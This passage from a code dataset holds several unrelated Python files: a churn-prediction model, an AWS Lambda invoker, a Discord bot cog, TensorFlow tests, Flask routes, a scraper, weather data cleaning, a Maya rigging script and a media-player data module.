> last_known_datapoint:\n first_pred_val = predicted_data[len(data)]\n rev_first_pred_val = (last_known_datapoint / data[-2]) * last_known_datapoint\n adj_fact = first_pred_val - rev_first_pred_val\n\n for i in range(len(data), len(predicted_data)):\n predicted_data[i] = predicted_data[i] - adj_fact\n\n return predicted_data\n\n\ndef fit_predict(data, future_periods, include_past=False, smoothing=True, cohort_name=None):\n \"\"\"Combine fit and predict_survival into one step\"\"\"\n\n sbg_fit_failed = False\n\n if data[-1] == 0.0:\n predicted_data = data.copy()\n for i in range(future_periods):\n predicted_data.append(0.0)\n sbg_fit_failed = True\n\n if not sbg_fit_failed:\n try:\n alpha, beta = fit(data)\n except:\n if cohort_name is not None:\n print(\"Switching to terminal churn rate for cohort: {}\".format(cohort_name))\n predicted_data = predict_with_terminal_churn(data, future_periods)\n sbg_fit_failed = True\n\n if not sbg_fit_failed:\n # predict the next future_periods time samples:\n predicted_data = predicted_survival(alpha, beta, len(data) + future_periods)\n\n if smoothing:\n predicted_data = apply_smoothing(data, predicted_data)\n\n if include_past:\n return predicted_data\n else:\n return predicted_data[-future_periods:]\n\n\ndef test():\n \"\"\"Test against the High End subscription retention data from the paper\"\"\"\n example_data = [0.869, 0.743, 0.653, 0.593, 0.551, 0.517, 0.491]\n ll11 = log_likelihood(1.0, 1.0, example_data)\n print(np.allclose(ll11, -2.115, 1e-3))\n\n res = maximize(example_data)\n alpha, beta = res.x\n print(res.status == 0 and np.allclose(alpha, 0.668, 1e-3) and np.allclose(beta, 3.806, 1e-3))\n print()\n\n print(\"real\\t\", [\"{0:.1f}%\".format(x * 100) for x in example_data])\n print(\"pred\\t\", [\"{0:.1f}%\".format(x * 100) for x in predicted_survival(alpha, beta, 12)])\n print()\n\n print(list(map(\"{0:f}\".format, [derl(alpha, beta, 0.1, x) for x in range(12)])))\n print()\n\n multi_cohort_data = [\n [10000, 8000, 6480, 5307, 4391],\n [10000, 8000, 6480, 5307],\n [10000, 8000, 6480],\n [10000, 8000],\n ]\n alpha, beta = fit_multi_cohort(multi_cohort_data)\n print(np.allclose(alpha, 3.80, 1e-2) and np.allclose(beta, 15.19, 1e-2))\n\n\ndef added_tests():\n # two examples of duplicate values\n data1 = [0.695652174, 0.695652174, 0.304347826, 0.130434783]\n data2 = [1.0, 1.0, 0.666666667, 0.333333333]\n\n # handling zero retention at the end\n data3 = [0.662093647, 0.53146436, 0.432448554, 0.371905756, 0.0]\n\n # handling smoothing\n data4 = [\n 0.662093647,\n 0.53146436,\n 0.432448554,\n 0.371905756,\n 0.326871458,\n 0.294661497,\n 0.267223382,\n 0.240679988,\n 0.225171488,\n 0.204891142,\n 0.190873844,\n 0.174470623,\n 0.16433045,\n 0.1565762,\n 0.144646585,\n 0.136892335,\n 0.130032806,\n 0.12496272,\n ]\n\n # should switch to using terminal churn rate\n t1 = fit_predict(data1, 5, cohort_name=\"Test Cohort 1\")\n t2 = fit_predict(data2, 5, cohort_name=\"Test Cohort 2\")\n\n # should return all zeros at the end\n t3 = fit_predict(data3, 5, cohort_name=\"Test Cohort 3\")\n print(t3)\n\n # test of smoothing, first smoothing is off\n t4 = fit_predict(data4, 5, cohort_name=\"Test Cohort 4\", smoothing=False)\n print(f\"Future value of {t4[0]} is greater than present value of {data4[-1]}\")\n\n # now with smoothing turned on\n t5 = fit_predict(data4, 5, cohort_name=\"Test Cohort 4\", smoothing=True)\n print(f\"Future values like {t5[0]} are adjusted to be less than {data4[-1]}\")\n\n\nif __name__ == \"__main__\":\n test()\n added_tests()\n","sub_path":"shifted_beta_geometric/sbg.py","file_name":"sbg.py","file_ext":"py","file_size_in_byte":9237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"527005077","text":"from time import time\nfrom subprocess import call\nfrom threading import Thread\n\n\nclass ExecuteLambda:\n def __init__(self, lambda_name, cmd_executor=call, out=print):\n self._lambda_name = lambda_name\n self._executor = cmd_executor\n self._out = out\n self.runtime = None\n\n def exec(self):\n start = time()\n f_name = f\"/tmp/{time()}\"\n cmd_str = f\"aws lambda invoke --function-name {self._lambda_name} '{f_name}'\"\n self._out(cmd_str)\n self._executor(cmd_str)\n with open(f_name) as f:\n self._out(f.read())\n self.runtime = time() - start\n\n\ndef exec_in_parallel(target, max_threads=10):\n threads = {index: {\"thread\": Thread(target=target)} for index in range(max_threads)}\n for thread_dict in threads.values():\n thread_dict[\"thread\"].start()\n thread_dict[\"start_time\"] = time()\n for thread_dict in threads.values():\n thread_dict[\"thread\"].join()\n thread_dict[\"end_time\"] = time()\n\n\nif __name__ == '__main__':\n exec_in_parallel(\n lambda: ExecuteLambda(\n \"A_ReusableInstances\",\n cmd_executor=lambda x: call(x, shell=True)\n ).exec(),\n max_threads=1\n )\n","sub_path":"AWS/Lambda/B_Runtime/src/main/java/parallel_client.py","file_name":"parallel_client.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"343942502","text":"import logging\nimport random\nfrom pathlib import Path\n\nimport discord\nfrom discord.ext import commands\n\nfrom bot.bot import SeasonalBot\nfrom bot.constants import Hacktoberfest\n\nlog = logging.getLogger(__name__)\n\n\nclass SpookySound(commands.Cog):\n \"\"\"A cog that plays a spooky sound in a voice channel on command.\"\"\"\n\n def __init__(self, bot: SeasonalBot):\n self.bot = bot\n self.sound_files = list(Path(\"bot/resources/halloween/spookysounds\").glob(\"*.mp3\"))\n self.channel = None\n\n @commands.cooldown(rate=1, per=1)\n @commands.command(brief=\"Play a spooky sound, restricted to once per 2 mins\")\n async def spookysound(self, ctx: commands.Context) -> None:\n \"\"\"\n Connect to the Hacktoberbot voice channel, play a random spooky sound, then disconnect.\n\n Cannot be used more than once in 2 minutes.\n \"\"\"\n if not self.channel:\n await self.bot.wait_until_guild_available()\n self.channel = self.bot.get_channel(Hacktoberfest.voice_id)\n\n await ctx.send(\"Initiating spooky sound...\")\n file_path = random.choice(self.sound_files)\n src = discord.FFmpegPCMAudio(str(file_path.resolve()))\n voice = await self.channel.connect()\n voice.play(src, after=lambda e: self.bot.loop.create_task(self.disconnect(voice)))\n\n @staticmethod\n async def disconnect(voice: discord.VoiceClient) -> None:\n \"\"\"Helper method to disconnect a given voice client.\"\"\"\n await voice.disconnect()\n\n\ndef setup(bot: SeasonalBot) -> None:\n \"\"\"Spooky sound Cog load.\"\"\"\n bot.add_cog(SpookySound(bot))\n","sub_path":"bot/exts/halloween/spookysound.py","file_name":"spookysound.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373454588","text":"\"\"\" Test itl module utils. \"\"\"\n\nimport os\nimport pytest\n\nimport itl.utils as utils\nimport tensorflow as tf\nimport numpy as np\n\n\ndef test_default_1():\n val = 1\n assert(utils.default(val, None) == val)\n\n\ndef test_default_None():\n val = None\n assert(utils.default(val, 1) is not None)\n\n\ndef test_get_env_precision_float32():\n os.environ['ITL_PRECISION'] = 'fp32'\n precision = utils.get_env_precision()\n del os.environ['ITL_PRECISION']\n assert(precision == 'fp32')\n\n\ndef test_get_env_precision_float64():\n os.environ['ITL_PRECISION'] = 'fp64'\n precision = utils.get_env_precision()\n del os.environ['ITL_PRECISION']\n assert(precision == 'fp64')\n\n\ndef test_get_env_precision_failure():\n os.environ['ITL_PRECISION'] = 'int32'\n with pytest.raises(NotImplementedError):\n precision = utils.get_env_precision()\n del os.environ['ITL_PRECISION']\n\ndef test_variable_summaries_int():\n dummy = tf.constant(1)\n utils.variable_summaries(\"dummy\", dummy)\n with tf.Session() as sess:\n test = sess.run(dummy)\n assert(test == 1)\n\n\ndef test_variable_summaries_float32():\n os.environ['ITL_PRECISION'] = 'fp32'\n dummy = tf.Variable(tf.zeros(shape=[2, 3], dtype=tf.float32),\n trainable=True, name='dummy')\n utils.variable_summaries(\"dummy\", dummy)\n tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n test = sess.run(dummy)\n del os.environ['ITL_PRECISION']\n assert(np.allclose(test, np.zeros((2, 3))))\n\n\ndef test_variable_summaries_float64():\n os.environ['ITL_PRECISION'] = 'fp64'\n dummy = tf.Variable(tf.zeros(shape=[2, 3], dtype=tf.float64),\n trainable=True, name='dummy')\n utils.variable_summaries(\"dummy\", dummy)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n test = sess.run(dummy)\n del os.environ['ITL_PRECISION']\n assert(np.allclose(test, np.zeros((2, 3))))\n\n\ndef test_Problem_Regression():\n pb = utils.Problem\n assert(hasattr(pb, 'Regression'))\n\n\ndef test_Problem_Classification():\n pb = utils.Problem\n assert(hasattr(pb, 'Classification'))\n\n\ndef test_tf_type_float32():\n fp = 'fp32'\n assert(utils.tf_type(fp) is tf.float32)\n\n\ndef test_tf_type_float64():\n fp = 'fp64'\n assert(utils.tf_type(fp) is tf.float64)\n\n\ndef test_tf_type_int32():\n fp = 'int64'\n with pytest.raises(NotImplementedError):\n dummy = utils.tf_type(fp)\n\n\ndef test_np_type_float32():\n fp = 'fp32'\n assert(utils.np_type(fp) is np.float32)\n\n\ndef test_np_type_float64():\n fp = 'fp64'\n assert(utils.np_type(fp) is np.float64)\n\n\ndef test_np_type_int32():\n fp = 'int64'\n with pytest.raises(NotImplementedError):\n dummy = utils.np_type(fp)\n\n\ndef test_get_type_numpy():\n dummy = np.zeros([], dtype=np.float32)\n assert(utils.get_type(dummy) is np.float32)\n\n\ndef test_get_type_tensorflow():\n dummy = tf.zeros([], dtype=np.float32)\n assert(utils.get_type(dummy) is tf.float32)\n\n\n@pytest.mark.parametrize(\"array\",\n [1, 0., [1.], (0, 1.), [[1.], [1]], ([0.], [1]),\n np.zeros([]), np.zeros((1, 1)), np.zeros((1,)),\n np.zeros([1, 2, 3]), None, tf.constant(0),\n tf.constant([0, 1]), 'toto'])\ndef test_data_array(array):\n if isinstance(array, str):\n with pytest.raises(BaseException):\n convert = utils.data_array(array)\n return\n convert = utils.data_array(array)\n assert(isinstance(convert, np.ndarray) or\n isinstance(convert, tf.Tensor) or\n (convert is None))\n if array is not None:\n if isinstance(array, tf.Tensor):\n tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n assert(len(sess.run(convert).shape) == 2)\n else:\n assert(len(convert.shape) == 2)\n\n\n@pytest.mark.parametrize(\"ex_val\", np.random.rand(10))\ndef test_quadratic_infinimal_convolution_0(ex_val):\n tf_ex_val = tf.constant(ex_val)\n val = utils.quadratic_infinimal_convolution(tf_ex_val, 0)\n tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n val = sess.run(val)\n assert(np.isclose(val, ex_val))\n\n@pytest.mark.parametrize(\"ex_val\", np.random.rand(10))\ndef test_quadratic_infinimal_convolution_1(ex_val):\n tf_ex_val = tf.constant(ex_val)\n val = utils.quadratic_infinimal_convolution(tf_ex_val, 1)\n tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n val = sess.run(val)\n assert(np.isclose(val, ex_val ** 2))\n","sub_path":"itl/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"354727469","text":"import sys\n\nfrom plugins import prefix\n\n\ndef p(arg, file_map, output_files):\n arg = arg.strip()\n if not prefix.VALID_PREFIX.match(arg):\n sys.exit(arg + ' is not a valid prefix!')\n for p_file, t_file in file_map[arg]:\n output_files[t_file] = p_file\n","sub_path":"plugins/build/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"351026424","text":"from flask import Blueprint, render_template, current_app, request, url_for\nfrom flask_paginate import Pagination, get_page_parameter\nfrom sqlalchemy import func, or_\n\nfrom app import db\nfrom app.models import Entity, Link\n\nbp = Blueprint('main', __name__)\n\n\n@bp.route('/')\n@bp.route('/index')\ndef index():\n q = request.args.get('q')\n search = q and q is not None\n\n page = request.args.get(get_page_parameter(), default=1, type=int)\n entities = db.session.query(Entity.name, Entity.uuid, Entity.type)\\\n .paginate(page, current_app.config['ENTITIES_PER_PAGE'], False).items\n total = db.session.query(func.count(Entity.uuid)).scalar()\n pagination = Pagination(page=page, total=total, search=search,\n record_name='entities',\n per_page=current_app.config['ENTITIES_PER_PAGE'],\n bs_version=4,\n inner_window=5)\n return render_template('index.html', title='Home', entities=entities,\n pagination=pagination)\n\n\n@bp.route('/entity/')\ndef profile(e_uuid):\n entity = Entity.query.filter_by(uuid=e_uuid).first()\n links = Link.query.filter(or_(Link.node_a == e_uuid, Link.node_b == e_uuid)).all()\n links_with_names = []\n for link in links:\n link = link.to_dict\n link['node_a'] = db.session.query(Entity.name, Entity.uuid) \\\n .filter(Entity.uuid == link.get('node_a')).first().name\n link['node_b'] = db.session.query(Entity.name, Entity.uuid) \\\n .filter(Entity.uuid == link.get('node_b')).first().name\n links_with_names.append(link)\n title = 'Profile: %s' % entity.name\n return render_template('profile.html', title=title, entity=entity,\n links=links_with_names)\n\n\n@bp.route('/about')\ndef about():\n return render_template('about.html', title='About')\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"149874564","text":"#-*- coding: utf-8 -*-\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen('http://cnodejs.org/')\nbsObj = BeautifulSoup(html, 'html.parser')\n\ncontent = bsObj.find('div', {'id': 'topic_list'}).findAll('a', {'class': 'topic_title'})\n\nfor title in content:\n\tprint(title.get_text())","sub_path":"cnode/cnode.py","file_name":"cnode.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472802934","text":" #SETTING UP THE DATAFRAME\r\ndf = pd.DataFrame(records, columns=features).set_index('date') \r\n\r\n\"\"\"it is quite helpful to have subject matter knowledge in the area under investigation to aid in selecting meaningful \r\n features to investigate paired with a thoughtful assumption of likely patterns in data.\"\"\"\r\n\"\"\"many of the retrived data will prove to be either uninformative in predicting weather temperatures or inappropriate\r\n candidates depending on the type of model being used but, the crux is that we simply do not know until you rigorously\r\n investigate the data.\"\"\"\r\n \r\n#DERIVING THE FEATURES\r\ntmp = df[['meantempm', 'meandewptm']].head(10)\r\n# 1 day prior\r\nN = 1\r\n\r\n# target measurement of mean temperature\r\nfeature = 'meantempm'\r\n\r\n# total number of rows\r\nrows = tmp.shape[0]\r\n\r\n# a list representing Nth prior measurements of feature\r\n# notice that the front of the list needs to be padded with N\r\n# None values to maintain the constistent rows length for each N\r\nnth_prior_measurements = [None]*N + [tmp[feature][i-N] for i in range(N, rows)]\r\n\r\n# make a new column name of feature_N and add to DataFrame\r\ncol_name = \"{}_{}\".format(feature, N) \r\ntmp[col_name] = nth_prior_measurements \r\n\r\n#generalizing the above steps into an function to apply for all the features \r\ndef derive_nth_day_feature(df, feature, N): \r\n rows = df.shape[0]\r\n nth_prior_measurements = [None]*N + [df[feature][i-N] for i in range(N, rows)]\r\n col_name = \"{}_{}\".format(feature, N)\r\n df[col_name] = nth_prior_measurements\r\n\r\n#applied for all the features for 1_day prior,2_day prior,3_day prior \r\nfor feature in features: \r\n if feature != 'date':\r\n for N in range(1, 4):\r\n derive_nth_day_feature(df, feature, N)\r\n \r\n\r\n#DATA CLEANING PART\r\n#As the data in the data frame is very large we are reducing the no.of columns in the dataframe by selecting\r\n#necessary features for our project\r\n#As the goal of this project is to predict the future temperature based off the past three days of weather\r\n# measurements. With this in mind we only want to keep the min, max, and mean temperatures for each day \r\n# making a list of original features without meantempm, mintempm, and maxtempm\r\nto_remove = [feature \r\n for feature in features \r\n if feature not in ['meantempm', 'mintempm', 'maxtempm']]\r\n\r\n# make a list of columns to keep\r\nto_keep = [col for col in df.columns if col not in to_remove]\r\n\r\n# select only the columns in to_keep and assign to df\r\ndf = df[to_keep]#df.columns to confirm whether the columns are removed or not\r\n\r\n#df.info() gives us the information of a dataframe.Initially the datatype of all the columns are object type,we need to \r\n#convert them into numericals for performing numerical analysis\r\n\r\n#converting object type to numerical type\r\n#The error='coerce' parameter will fill any textual values to NaNs.\r\ndf = df.apply(pd.to_numeric, errors='coerce')\r\n#df.info() to check whether the data type has changed or not\r\n\r\n\r\n#describe() will produce a DataFrame containing the count, mean, standard deviation, min, 25th percentile,\r\n#50th percentile (or median), the 75th percentile and, the max value. This can be very useful information\r\n#to evaluating the distribution of the feature data.\r\n\r\n# Call describe on df and transpose it due to the large number of columns\r\nspread = df.describe().T\r\n#enter spread in the console to look at the dataframe produced by describe()\r\n\r\n\r\n#IDENTENTIFYING THE OUTLIERS\r\n# precalculate interquartile range for ease of use in next calculation\r\nIQR = spread['75%'] - spread['25%']\r\n\r\n# create an outliers column which is either 3 IQRs below the first quartile or\r\n# 3 IQRs above the third quartile\r\nspread['outliers'] = (spread['min']<(spread['25%']-(3*IQR)))|(spread['max'] > (spread['75%']+3*IQR))\r\n\r\n# just display the features containing extreme outliers\r\n#spread.loc[spread.outliers,] or spread.loc[spread.outliers,] in console\r\n\r\n#ANALYSING OUTLIERS USING HISTOGRAM IN NEW DOCUMENT\r\n\r\n#DEALING WITH MISSING VALUES\r\n#type df.info() to see the dataframe frame info and we can also see the no.of missing values of each feature\r\n#fill the missing values with an interpolated value that is a reasonable estimation of the true values of a feature\r\n#here as precipitation has most of the mising values we fill them with the majority value of precipitation i.e 0\r\n\r\n# iterate over the precip columns\r\nfor precip_col in ['precipm_1', 'precipm_2', 'precipm_3']: \r\n # create a boolean array of values representing nans\r\n missing_vals = pd.isnull(df[precip_col])\r\n df[precip_col][missing_vals] = 0\r\n\r\n#we have taken care about all possible missing values and if still there are any missing we are going to dropthe rows containing missing values \r\ndf = df.dropna() \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"2_settting_up_dataframe.py","file_name":"2_settting_up_dataframe.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"360514175","text":"'''\nAuthor: Puffrora\nDate: 2020-10-08 18:26:44\nLastModifiedBy: Puffrora\nLastEditTime: 2020-10-08 18:41:57\n'''\n\n\n# 时间复杂度 O(N)\n# 空间复杂度 O(min(N, k))\n# 利用哈希取模加速\nclass Solution:\n def checkSubarraySum(self, nums, k):\n\n cur_sum = 0\n dic = {0: -1}\n for i, n in enumerate(nums):\n cur_sum += n\n\n if k != 0:\n cur_sum %= k\n \n if cur_sum in dic:\n if i - dic[cur_sum] > 1:\n return True\n else:\n dic[cur_sum] = i\n \n return False\n\n\n","sub_path":"Leetcode/leetcode523 连续的子数组和.py","file_name":"leetcode523 连续的子数组和.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197230695","text":"# footRoll Hierarchy\nimport maya.cmds as cmds\n\n\ndef footRollHierarchy(side):\n\n cmds.parent(\"ball_\"+side+\"_loc_offset\",\"footInside_\"+side+\"_loc\")\n cmds.parent(\"toes_\"+side+\"_loc_offset\",\"footInside_\"+side+\"_loc\")\n cmds.parent(\"footInside_\"+side+\"_loc_offset\",\"footOutside_\"+side+\"_loc\")\n cmds.parent(\"footOutside_\"+side+\"_loc_offset\",\"toesRoll_\"+side+\"_loc\")\n cmds.parent(\"toesRoll_\"+side+\"_loc_offset\",\"hell_\"+side+\"_loc\")\n\n\n # se emparenta la jerarquia de locators al jnt\n\n cmds.parent(\"hell_\"+side+\"_loc_offset\",\"footRoll_\"+side+\"_jnt\")\n \n # se frezea la rotacion para que tenga la misma orientacion que el ctr\n\n cmds.makeIdentity(\"hell_\"+side+\"_loc_offset\",r=True,a=True)\n\n\ndef footRollNodes(side):\n \n # se crean los nodos y se setean los valores que deben tener\n \n cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"toeRoll_\"+side+\"_sub\")\n cmds.setAttr(\"toeRoll_\"+side+\"_sub.operation\", 2, l=True)\n cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"ballRoll_\"+side+\"_sub\")\n cmds.setAttr(\"ballRoll_\"+side+\"_sub.operation\", 2, l=True)\n cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"ballRollTotal_\"+side+\"_sum\")\n cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"toeRollTotal_\"+side+\"_sub\")\n cmds.setAttr(\"toeRollTotal_\"+side+\"_sub.operation\", 2, l=True)\n cmds.shadingNode(\"plusMinusAverage\", asUtility=True, n=\"hellRollTotal_\"+side+\"_sub\")\n cmds.setAttr(\"hellRollTotal_\"+side+\"_sub.operation\", 2, l=True)\n \n cmds.shadingNode(\"condition\", asUtility=True, n=\"footBank_\"+side+\"_cond\")\n cmds.setAttr(\"footBank_\"+side+\"_cond.operation\", 4, l=True)\n cmds.setAttr(\"footBank_\"+side+\"_cond.colorIfFalseR\", 0, l=True)\n cmds.shadingNode(\"condition\", asUtility=True, n=\"footRollHell_\"+side+\"_cond\")\n cmds.setAttr(\"footRollHell_\"+side+\"_cond.operation\", 4, l=True)\n cmds.setAttr(\"footRollHell_\"+side+\"_cond.colorIfFalseR\", 0, l=True)\n \n cmds.shadingNode(\"clamp\", asUtility=True, n=\"toeStart_\"+side+\"_clamp\")\n cmds.setAttr(\"toeStart_\"+side+\"_clamp.maxR\", 300, l=True)\n cmds.shadingNode(\"clamp\", asUtility=True, n=\"ballStart_\"+side+\"_clamp\")\n cmds.shadingNode(\"clamp\", asUtility=True, n=\"ballNegative_\"+side+\"_clamp\")\n cmds.setAttr(\"ballNegative_\"+side+\"_clamp.maxR\", 300, l=True)\n cmds.shadingNode(\"clamp\", asUtility=True, n=\"toeRoll_\"+side+\"_clamp\")\n\n # conexiones entre los nodos del footRoll\n\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"toeStart_\"+side+\"_clamp.minR\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"toeStart_\"+side+\"_clamp.inputR\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.toePivot\", \"toeRollTotal_\"+side+\"_sub.input1D[1]\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"toeRoll_\"+side+\"_clamp.maxR\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"ballStart_\"+side+\"_clamp.inputR\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"ballStart_\"+side+\"_clamp.maxR\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.ballPivot\", \"ballRollTotal_\"+side+\"_sum.input1D[1]\",f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeSlide\", \"toesRoll_\"+side+\"_loc.rotateY\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.ballSlide\", \"ball_\"+side+\"_loc.rotateY\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.toes\", \"toes_\"+side+\"_loc.rotateZ\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.ballSlide\", \"toes_\"+side+\"_loc.rotateY\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"footRollHell_\"+side+\"_cond.colorIfTrueR\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.footRoll\", \"footRollHell_\"+side+\"_cond.firstTerm\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.footBank\", \"footBank_\"+side+\"_cond.colorIfFalseG\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.footBank\", \"footBank_\"+side+\"_cond.colorIfTrueR\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.footBank\", \"footBank_\"+side+\"_cond.firstTerm\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.hellPivot\", \"hellRollTotal_\"+side+\"_sub.input1D[1]\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.hellSlide\", \"hell_\"+side+\"_loc.rotateY\", f=True, l=True)\n cmds.connectAttr(\"footIK_\"+side+\"_ctr.toeStart\", \"toeRoll_\"+side+\"_sub.input1D[1]\", f=True, l=True)\n\n \n cmds.connectAttr(\"toeStart_\"+side+\"_clamp.outputR\", \"toeRoll_\"+side+\"_sub.input1D[0]\", f=True, l=True)\n cmds.connectAttr(\"toeRoll_\"+side+\"_sub.output1D\", \"toeRoll_\"+side+\"_clamp.inputR\", f=True, l=True)\n cmds.connectAttr(\"toeRoll_\"+side+\"_sub.output1D\",\"toeRollTotal_\"+side+\"_sub.input1D[0]\", f=True, l=True) \n cmds.connectAttr(\"toeRollTotal_\"+side+\"_sub.output1D\", \"toesRoll_l_loc.rotateZ\", f=True, l=True) \n cmds.connectAttr(\"toeRoll_\"+side+\"_clamp.outputR\", \"ballRoll_\"+side+\"_sub.input1D[1]\", f=True, l=True) \n cmds.connectAttr(\"ballStart_\"+side+\"_clamp.outputR\", \"ballRoll_\"+side+\"_sub.input1D[0]\",f=True, l=True) \n cmds.connectAttr(\"ballRoll_\"+side+\"_sub.output1D\", \"ballNegative_\"+side+\"_clamp.inputR\", f=True, l=True) \n cmds.connectAttr(\"ballNegative_\"+side+\"_clamp.outputR\",\"ballRollTotal_\"+side+\"_sum.input1D[0]\", f=True, l=True) \n cmds.connectAttr(\"ballRollTotal_\"+side+\"_sum.output1D\", \"ball_\"+side+\"_loc.rotateZ\",f=True, l=True) \n cmds.connectAttr(\"footBank_\"+side+\"_cond.outColorR\", \"footInside_\"+side+\"_loc.rotateX\", f=True, l=True)\n cmds.connectAttr(\"footBank_\"+side+\"_cond.outColorG\", \"footOutside_\"+side+\"_loc.rotateX\", f=True, l=True) \n cmds.connectAttr(\"footRollHell_\"+side+\"_cond.outColorR\", \"hellRollTotal_\"+side+\"_sub.input1D[0]\", f=True, l=True)\n cmds.connectAttr(\"hellRollTotal_\"+side+\"_sub.output1D\", \"hell_\"+side+\"_loc.rotateZ\", f=True, l=True)\n\n \ncmds.makeIdentity(\"footRollPosition_l_grp\",r=True,a=True)\n \n\n\n\n\n\n\n\n\n\n","sub_path":"setup/old/olderVersions/rigging_v01/builder/footRoll.py","file_name":"footRoll.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"368782971","text":"import json\nimport os\nfrom random import randint\nimport inspect\ntry:\n from omxplayer.player import OMXPlayer\nexcept:\n pass\n\nfrom data_centre.browser_data import BrowserData\n\ndef get_the_current_dir_path():\n # TODO: investigate weird path formatting differences\n current_file_path = inspect.stack()[0][1]\n return os.path.split(current_file_path)[0]\n\nBANK_DATA_JSON = 'display_data.json'\nNEXT_SLOT_JSON = 'next_slot_number.json'\nSETTINGS_JSON = 'settings.json'\nEMPTY_SLOT = dict(name='', location='', length=-1, start=-1, end=-1)\nPATH_TO_DATA_OBJECTS = '{}/json_objects/'.format(get_the_current_dir_path())\n\ndef read_json(file_name):\n with open(PATH_TO_DATA_OBJECTS + file_name) as data_file:\n data = json.load(data_file)\n return data\n\n\ndef update_json(file_name, data):\n with open('{}{}'.format(PATH_TO_DATA_OBJECTS, file_name), 'w') as data_file:\n json.dump(data, data_file)\n\n\n\ndef get_path_to_browser():\n return read_json('path_to_browser.json')\n\nPATH_TO_BROWSER = get_path_to_browser()\n\n\nclass Data(object):\n def __init__(self, message_handler):\n self.browser_data = BrowserData(PATH_TO_BROWSER)\n self.message_handler = message_handler\n\n self.has_omx = self._try_import_omx()\n print('has_omx: {}'.format(self.has_omx))\n self.DEV_MODE = read_json(SETTINGS_JSON)[6][\"value\"]\n\n\n\n def create_new_slot_mapping_in_first_open(self, file_name):\n ######## used for mapping current video to next available slot ########\n memory_bank = read_json(BANK_DATA_JSON)\n for index, slot in enumerate(memory_bank):\n if (not slot['name']):\n self.create_new_slot_mapping(index, file_name)\n return True\n return False\n\n def create_new_slot_mapping(self, slot_number, file_name):\n ######## used for mapping current video to a specific slot ########\n has_location, location = self._get_path_for_file(file_name)\n print('file_name:{},has_location:{}, location:{}'.format(file_name,has_location, location))\n length = self._get_length_for_file(location)\n new_slot = dict(name=file_name, location=location, length=length, start=-1, end=-1)\n self._update_a_slots_data(slot_number, new_slot)\n\n @staticmethod\n def clear_all_slots():\n memory_bank = read_json(BANK_DATA_JSON)\n for index, slot in enumerate(memory_bank):\n memory_bank[index] = EMPTY_SLOT\n update_json(BANK_DATA_JSON, memory_bank)\n\n def update_next_slot_number(self, new_value):\n memory_bank = read_json(BANK_DATA_JSON)\n if memory_bank[new_value]['location'] == '':\n print('its empty!')\n self.message_handler.set_message('INFO', 'the slot you pressed is empty')\n else:\n update_json(NEXT_SLOT_JSON, new_value)\n\n def add_open_folder(self, folder_name):\n self.browser_data.update_open_folders(folder_name)\n\n def switch_settings(self, setting_index):\n ######## update the value of selected setting by cycling through valid options ########\n settings = read_json(SETTINGS_JSON)\n\n for index, setting in enumerate(settings):\n if index == setting_index:\n self._cycle_setting_value(setting)\n\n update_json(SETTINGS_JSON, settings)\n\n def 